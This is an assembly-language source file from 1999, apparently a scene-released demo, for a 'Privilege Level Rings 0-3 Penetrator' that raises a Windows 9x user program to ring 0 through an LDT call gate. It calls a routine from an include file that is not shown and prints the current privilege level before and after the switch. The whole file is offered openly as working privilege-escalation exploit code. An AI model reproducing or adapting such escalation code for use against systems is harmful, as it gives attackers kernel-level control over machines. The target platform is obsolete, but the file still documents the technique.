;--------------------------------------------------------------------------;
; Privilege Level Rings 0-3 Penetrator v1.0, (x) 1999 by PREDAt0R	   ;
;--------------------------------------------------------------------------;
;
; Features:
;
;   target oses are Windows 9x family
;   actual usage is allowed only for win32 applications (ring 3)
;   penetrates at the privilege level rings 0-3
;   uses ldt callgate, modifies only current tss and ldt
;   simply code
;
;--------------------------------------------------------------------------;
; ps: you can e-mail me at necrobug@usa.net
;

.386p
.model flat,stdcall
jumps

;===[ Import Section ]====================================================;

extrn	ExitProcess:proc
extrn	GetStdHandle:proc
extrn	WriteFile:proc
extrn	lstrlenA:proc
extrn	wsprintfA:proc

;===[ Data Section ]======================================================;

.data   

; some equitions

CR	equ	0dh,0ah
ofs	equ	offset

; some windoze flags and constants

STD_OUTPUT_HANDLE	=  -11

; include main penetrator routine (in .data section :)

include	penetx.inc

; other data

copylefts	db	'Privilege Level Rings 0-3 Penetrator v1.0 demo, '
		db	'(x) 1999 by PREDAt0R',CR,CR,0
initial_msg	db	'Current cpl is %01X',CR,0
penetrate_msg	db	'Switching to ring %01X through ldt callgate '
		db	'was succefull!',CR,0
szMsg		db	100h dup (?)	; buffer for wsprintfA
hStdOutput	dd	?		; console output handler
Empty		dd	?,?		; for different usage

;===[ Code Section ]======================================================;

.code
main:
	call	GetStdHandle,STD_OUTPUT_HANDLE	; get standart output handler
	mov	dword ptr [hStdOutput],eax	; and remember it

	call	prints,ofs copylefts		; write copylefts

	mov	ebp,esp				; save stack pointer, cuz
						; wsprintf will not restore it
	push	cs
	and	dword ptr [esp],11b		; display current cpl
	call	wsprintfA,ofs szMsg,ofs initial_msg
	call	prints,ofs szMsg

	reqPL	equ	00b			; required privilege level
	call	penetrator_x,reqPL,ofs ring_x	; run ring_x with cpl=reqPL

	call	wsprintfA,ofs szMsg,ofs penetrate_msg,eax
	call	prints,ofs szMsg		; display cpl returned by ring_x

	mov	esp,ebp				; restore stack

        call 	ExitProcess,0			; close our task

; this code will be ran on the reqPL privilege level ring

ring_x:
	push	cs				; get current code selector
	pop	eax
	and	eax,11b				; return cpl
	retf

;---[ Routines ]----------------------------------------------------------;

; routine write asciiz string into standart output device (console)
; lpStr - pointer to a null-terminated (asciiz) string
; [hStdOutput] - standart output device handler
; [Empty] - unused dword

prints	proc	lpStr:dword

	call	lstrlenA,[lpStr]	; get asciiz string size at eax
	lpNumb	equ ofs Empty
        call    WriteFile,[hStdOutput],[lpStr],eax,lpNumb,0

        ret

prints	endp

end main
